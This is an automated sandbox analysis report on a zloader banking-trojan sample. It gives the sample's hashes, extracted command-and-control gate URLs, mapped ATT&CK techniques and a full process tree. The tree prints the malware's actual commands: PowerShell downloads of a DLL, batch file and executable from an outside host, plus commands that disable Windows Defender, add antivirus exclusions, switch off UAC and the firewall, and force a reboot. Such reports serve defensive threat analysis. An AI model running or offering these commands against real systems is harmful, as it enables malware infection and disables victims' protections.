zloader | 0f527546d025e3705bdbba6eb98226373a8b8368bd1d2915a5f195541566d11e

Analysis

max time kernel
71s
max time network
153s
platform
windows10_x64
resource
win10v20210410
submitted
13-08-2021 06:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2d4358c9390a9586c2e262ebcec37535.exe
Size

165KB
MD5

2d4358c9390a9586c2e262ebcec37535
SHA1

36aad53c5bd366bb037da9e5a2569352a56d2df7
SHA256

0f527546d025e3705bdbba6eb98226373a8b8368bd1d2915a5f195541566d11e
SHA512

6367cea3f505eaaf588af49089d48486385dba77de7821c03f9ff6707bc47bffaa4cb3021999657b4effd633c52e3d46ae6231e026e6ac3b23c3853bf6b31429

Score

10^/10

zloader vasja vasja botnet evasion persistence trojan

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain

rsa_pubkey.plain

Signatures

Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

8 2040 powershell.exe
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

1216 regsvr32.exe

flow	pid	process
8	2040	powershell.exe

pid	process
1216	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

2d4358c9390a9586c2e262ebcec37535.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	2d4358c9390a9586c2e262ebcec37535.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	2d4358c9390a9586c2e262ebcec37535.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2040 powershell.exe
2040 powershell.exe
2040 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2040 powershell.exe

pid	process
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2040	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

2d4358c9390a9586c2e262ebcec37535.execmd.exeregsvr32.exe

description	pid	process	target process
PID 3908 wrote to memory of 808	3908	2d4358c9390a9586c2e262ebcec37535.exe	cmd.exe
PID 3908 wrote to memory of 808	3908	2d4358c9390a9586c2e262ebcec37535.exe	cmd.exe
PID 808 wrote to memory of 2040	808	cmd.exe	powershell.exe
PID 808 wrote to memory of 2040	808	cmd.exe	powershell.exe
PID 808 wrote to memory of 3832	808	cmd.exe	regsvr32.exe
PID 808 wrote to memory of 3832	808	cmd.exe	regsvr32.exe
PID 3832 wrote to memory of 1216	3832	regsvr32.exe	regsvr32.exe
PID 3832 wrote to memory of 1216	3832	regsvr32.exe	regsvr32.exe
PID 3832 wrote to memory of 1216	3832	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\2d4358c9390a9586c2e262ebcec37535.exe
"C:\Users\Admin\AppData\Local\Temp\2d4358c9390a9586c2e262ebcec37535.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3908

C:\Windows\SYSTEM32\cmd.exe
cmd /c start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/JavaE.dll -OutFile JavaE.dll
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\system32\regsvr32.exe
regsvr32 JavaE.dll
3⤵
- Suspicious use of WriteProcessMemory
PID:3832

C:\Windows\SysWOW64\regsvr32.exe
JavaE.dll
4⤵
- Loads dropped DLL
PID:1216

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
5⤵
PID:2656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat
3⤵
PID:2408

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:64

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
4⤵
PID:3936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe
4⤵
PID:1940

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
4⤵
PID:2844

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T sc config WinDefend start= disabled
4⤵
PID:1376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
4⤵
PID:1972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
4⤵
PID:2140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
4⤵
PID:2232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
4⤵
PID:512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
4⤵
PID:2664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
4⤵
PID:2580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/autorun100.bat -OutFile autorun100.bat
4⤵
PID:1008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
4⤵
PID:4056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
4⤵
PID:3856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
4⤵
PID:1344

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
5⤵
PID:2896

C:\Windows\system32\shutdown.exe
shutdown.exe /r /f /t 00
4⤵
PID:2140

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3acd855 /state1:0x41c64e6d
1⤵
PID:2128

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
0d5329a501d2e7b9d57efb4fe96b3550

SHA1
bf815e8bda2ecdc2406233d56474c8f6850be415

SHA256
bcefb1aa2448ef0221ad2c0690b9110865cb16166d3db1cf13795342d15e2fa2

SHA512
71e18b04591a140c3f0c3029c57337ca632556e8c21ccb90af275fcbf125a16c1cfe7941ad9c8ec5ffcf717e69cb3748f05eacc2e38b0eaed0202c35f4440171

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
0f67736768d5ac70e1e4fb7958d8513a

SHA1
1a4229f0086cd88406fb6bc078b0061482b41fa8

SHA256
d2567dc3d057cd8e153084f95e61d93f81b60a894acafd04679db2c1e1bc2c01

SHA512
509307ea02d761443f7018d424d9fdbdde2a01c8e0eeeb7f5b02fbaef2e4cdb1c0b9eb34132487a8bff67378aa11cdf6775932c7ce00c0d5ad31915d5e882558

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
82920c93c0a75defc6a32001706c43bd

SHA1
60755fb5fa1e0cbd4df86c3ab9aab0f33f0e9761

SHA256
2af7dfd49b2b797e6a5bd8168d0a50ea0aefbb0fb717138262d477c137cace6e

SHA512
a88174e164ad22ee7a176aeb4f6828c5d31a419fa8960e3bb33d991348933bf7ac19ab2aa3f403f1eb9122fc480982ae7bd23d33e42d3f57f5ebc3c4aed6b352

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d2a0b2b105e95e5c5b31173450447de6

SHA1
e88ecdbb20c35d4d93124fbc921c1bd914461ae5

SHA256
a8c90af8991444750fe3f8f1ebbef4c2a458d693d885b9740cb02273e7142f87

SHA512
0e5023eea51599f448b849532adcd0255582da11e8dd06e7cd86dcfb7a03eb176acb3bbacc912052319b999a4b914e745c653bba10e8952cb98e4efe019fb707

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
6810fbcec058a93cb9c9c7611fc72102

SHA1
8cc1f8c2c5b1e47cd126851073204dc10cc2a17b

SHA256
c3cb6c450159457d99c3f50a40a9a8cc6a3dd882335e91809a294bd48c880197

SHA512
a56e9c355191bb312ba1f78cd4ab002e9f9283d2e0ea0203d5a225dd8d6730c4f641c98f656eaea3b666ff8c4f1a544a1da6a9821aeb8e4cf63bd25197e1e4ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
9ac308ff715de32ba52b8f39a0379d4c

SHA1
4c6797c14eaba3cdde2f9977f60482d4d8ce8ccd

SHA256
e82287a93bd80a0878081fea260488255503aef5b9ac417ca0634d37e4eb5eba

SHA512
58ac5b3e62fa57bc2e6cdb8be9d86a953f70f818547dc87faffdc15cdd5a57d058009671658f49f93869a7f32f5f20fb63bcc68b8acbe1e4e05c90915579ba5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5d17194079ef42ea12d29119a529c187

SHA1
f696d21628217d4bd431622eec3c40a459c9f07e

SHA256
4e950aa7abd3073fb1b87923ad4cb08d6794cd589d2566a0535ac2f4174d7fd6

SHA512
467e60f980c852f82a3fb786173d2129070cbe0b54bbf0791092292d3e5c455009789b74e300589acf02a721c581a1577134013cd7527833c1cfed0268615310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
27378328d0a3f2dda51c33d588e33075

SHA1
948e889901fd85c6d513be48db3b33c2e0e9f86f

SHA256
0c48ba668f3d2ff0de1f5788ac53759b058e599694ce835c6238ed7d68ebaebb

SHA512
fcfe87b3ae9ad7f13386ca21390dbe002c698c47ea77c2002245a945e85f211a1613a36e69c32bc63ac6ab153a1f42d2c323073802ba51c606ab3669d18cc2db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ce1db3e55d65db7d027d0f873e3b72fc

SHA1
267ce8b309889795964ca0b8b344a914fdc43b64

SHA256
318f65d1bb63c732dbeabe73c3781c920e54958eb25883bcf79610c5f0f31a79

SHA512
99fb9b4f17880edec83adaf73841b674f359491b13990ef03c68d9cea74fc06f79d3e5f2a38a738652112da20b84186dc5bf5a29a3e08839bae327f7c98bdaa3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
cce5f4329168e9f882f00494b577cb3f

SHA1
070ca7c19aa9dc302df13bf289aa09f5ab68ff03

SHA256
52435fb56f4f849f46550bb551a4a64895ed50e588d092ad5139063e39035203

SHA512
e589c891c9ebec1574f144c34ae25ed4df33cbc0be96670d095fad5d0477829d1562409b7da02d2d6d29c18ecbf715a00c2d7c380947ff732f7c19c8515f5043

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
bee74ec8105e14eb278449973ea950ee

SHA1
44fdf6460eb0357aed75e494a62bf9e5fec716ff

SHA256
3192812f8f68f9f5da22e0ae94ea2a7598db311b285c8019791e6d0e11314a15

SHA512
91a98bd51705857f9ceba73df9bb05c00bda931f10d42a92cb0b88cd369a665dd3a194c6514aa7bb047ac24fa7532c24f5fe565c58f4a8c900929dcc6d19eec0

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
MD5
67858651d8acf00e98997f3b2f418796

SHA1
42c88f704e9ef686e336647b94baa997fbe36b0c

SHA256
d21b99d694f75386afb891753f4c4a4c023cd3ae23c452a9e35a440b1655fd96

SHA512
04781fc2aba7fae039ebc70911da17de5b0175743ca4f78a8097c3468bbda895d67aafd59aef72b08887498c56c410926743ca9c112f674b73b065f5e48c7b89

Download Submit
C:\Users\Admin\AppData\Roaming\JavaE.dll
MD5
a9dd9b9eff47af724436e2abdcd5ce6c

SHA1
1a9c9258f0345f5edddd933a7bd15ec42be51f8e

SHA256
cdaca5b6aabd92a7b782c2d7b250cbc1b2ed4c5a78091271f788d58dedcd94f6

SHA512
28af95d398c6311bd593489019be39a23218d64d5236f765c4ecadf43bff07f0ab2aea10413ad7390e3805b09921cdd6c33db734023a6b91a1735125793aea52

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
\Users\Admin\AppData\Roaming\JavaE.dll
MD5
a9dd9b9eff47af724436e2abdcd5ce6c

SHA1
1a9c9258f0345f5edddd933a7bd15ec42be51f8e

SHA256
cdaca5b6aabd92a7b782c2d7b250cbc1b2ed4c5a78091271f788d58dedcd94f6

SHA512
28af95d398c6311bd593489019be39a23218d64d5236f765c4ecadf43bff07f0ab2aea10413ad7390e3805b09921cdd6c33db734023a6b91a1735125793aea52

Download Submit
memory/64-150-0x0000000000000000-mapping.dmp

Download
memory/512-345-0x000001F5EC676000-0x000001F5EC678000-memory.dmp

Filesize
8KB

Download
memory/512-321-0x000001F5EC670000-0x000001F5EC672000-memory.dmp

Filesize
8KB

Download
memory/512-305-0x0000000000000000-mapping.dmp

Download
memory/512-322-0x000001F5EC673000-0x000001F5EC675000-memory.dmp

Filesize
8KB

Download
memory/512-346-0x000001F5EC678000-0x000001F5EC679000-memory.dmp

Filesize
4KB

Download
memory/808-114-0x0000000000000000-mapping.dmp

Download
memory/1008-450-0x0000020079B13000-0x0000020079B15000-memory.dmp

Filesize
8KB

Download
memory/1008-456-0x0000020079B16000-0x0000020079B18000-memory.dmp

Filesize
8KB

Download
memory/1008-447-0x0000020079B10000-0x0000020079B12000-memory.dmp

Filesize
8KB

Download
memory/1008-431-0x0000000000000000-mapping.dmp

Download
memory/1216-144-0x0000000010000000-0x0000000010129000-memory.dmp

Filesize
1.2MB

Download
memory/1216-143-0x0000000000F30000-0x0000000000F31000-memory.dmp

Filesize
4KB

Download
memory/1216-141-0x0000000000000000-mapping.dmp

Download
memory/1344-536-0x0000018BFB4A3000-0x0000018BFB4A5000-memory.dmp

Filesize
8KB

Download
memory/1344-540-0x0000018BFB4A6000-0x0000018BFB4A8000-memory.dmp

Filesize
8KB

Download
memory/1344-535-0x0000018BFB4A0000-0x0000018BFB4A2000-memory.dmp

Filesize
8KB

Download
memory/1344-521-0x0000000000000000-mapping.dmp

Download
memory/1376-179-0x0000000000000000-mapping.dmp

Download
memory/1940-166-0x000002527B970000-0x000002527B972000-memory.dmp

Filesize
8KB

Download
memory/1940-152-0x0000000000000000-mapping.dmp

Download
memory/1940-168-0x000002527B973000-0x000002527B975000-memory.dmp

Filesize
8KB

Download
memory/1940-175-0x000002527B976000-0x000002527B978000-memory.dmp

Filesize
8KB

Download
memory/1972-218-0x0000020CD52B6000-0x0000020CD52B8000-memory.dmp

Filesize
8KB

Download
memory/1972-195-0x0000020CD52B3000-0x0000020CD52B5000-memory.dmp

Filesize
8KB

Download
memory/1972-194-0x0000020CD52B0000-0x0000020CD52B2000-memory.dmp

Filesize
8KB

Download
memory/1972-181-0x0000000000000000-mapping.dmp

Download
memory/2040-134-0x000001A7845D6000-0x000001A7845D8000-memory.dmp

Filesize
8KB

Download
memory/2040-133-0x000001A7845D3000-0x000001A7845D5000-memory.dmp

Filesize
8KB

Download
memory/2040-132-0x000001A7845D0000-0x000001A7845D2000-memory.dmp

Filesize
8KB

Download
memory/2040-127-0x000001A79EC10000-0x000001A79EC11000-memory.dmp

Filesize
4KB

Download
memory/2040-122-0x000001A7845E0000-0x000001A7845E1000-memory.dmp

Filesize
4KB

Download
memory/2040-116-0x0000000000000000-mapping.dmp

Download
memory/2140-275-0x00000195616A8000-0x00000195616A9000-memory.dmp

Filesize
4KB

Download
memory/2140-259-0x00000195616A6000-0x00000195616A8000-memory.dmp

Filesize
8KB

Download
memory/2140-230-0x00000195616A0000-0x00000195616A2000-memory.dmp

Filesize
8KB

Download
memory/2140-539-0x0000000000000000-mapping.dmp

Download
memory/2140-232-0x00000195616A3000-0x00000195616A5000-memory.dmp

Filesize
8KB

Download
memory/2140-222-0x0000000000000000-mapping.dmp

Download
memory/2232-277-0x000002E7F2890000-0x000002E7F2892000-memory.dmp

Filesize
8KB

Download
memory/2232-320-0x000002E7F2898000-0x000002E7F2899000-memory.dmp

Filesize
4KB

Download
memory/2232-263-0x0000000000000000-mapping.dmp

Download
memory/2232-278-0x000002E7F2893000-0x000002E7F2895000-memory.dmp

Filesize
8KB

Download
memory/2232-301-0x000002E7F2896000-0x000002E7F2898000-memory.dmp

Filesize
8KB

Download
memory/2408-148-0x0000000000000000-mapping.dmp

Download
memory/2580-424-0x0000020F4C086000-0x0000020F4C088000-memory.dmp

Filesize
8KB

Download
memory/2580-421-0x0000020F4C080000-0x0000020F4C082000-memory.dmp

Filesize
8KB

Download
memory/2580-432-0x0000020F4C088000-0x0000020F4C089000-memory.dmp

Filesize
4KB

Download
memory/2580-390-0x0000000000000000-mapping.dmp

Download
memory/2580-422-0x0000020F4C083000-0x0000020F4C085000-memory.dmp

Filesize
8KB

Download
memory/2656-149-0x0000000000280000-0x00000000002A6000-memory.dmp

Filesize
152KB

Download
memory/2656-145-0x0000000000000000-mapping.dmp

Download
memory/2664-348-0x0000000000000000-mapping.dmp

Download
memory/2664-389-0x000001584D238000-0x000001584D239000-memory.dmp

Filesize
4KB

Download
memory/2664-387-0x000001584D236000-0x000001584D238000-memory.dmp

Filesize
8KB

Download
memory/2664-364-0x000001584D233000-0x000001584D235000-memory.dmp

Filesize
8KB

Download
memory/2664-363-0x000001584D230000-0x000001584D232000-memory.dmp

Filesize
8KB

Download
memory/2844-177-0x0000000000000000-mapping.dmp

Download
memory/2896-537-0x0000000000000000-mapping.dmp

Download
memory/3832-139-0x0000000000000000-mapping.dmp

Download
memory/3856-493-0x000001C2C6456000-0x000001C2C6458000-memory.dmp

Filesize
8KB

Download
memory/3856-488-0x000001C2C6453000-0x000001C2C6455000-memory.dmp

Filesize
8KB

Download
memory/3856-486-0x000001C2C6450000-0x000001C2C6452000-memory.dmp

Filesize
8KB

Download
memory/3856-534-0x000001C2C6458000-0x000001C2C6459000-memory.dmp

Filesize
4KB

Download
memory/3856-476-0x0000000000000000-mapping.dmp

Download
memory/3936-151-0x0000000000000000-mapping.dmp

Download
memory/4056-484-0x000001B536C76000-0x000001B536C78000-memory.dmp

Filesize
8KB

Download
memory/4056-474-0x000001B536C73000-0x000001B536C75000-memory.dmp

Filesize
8KB

Download
memory/4056-473-0x000001B536C70000-0x000001B536C72000-memory.dmp

Filesize
8KB

Download
memory/4056-455-0x0000000000000000-mapping.dmp

Download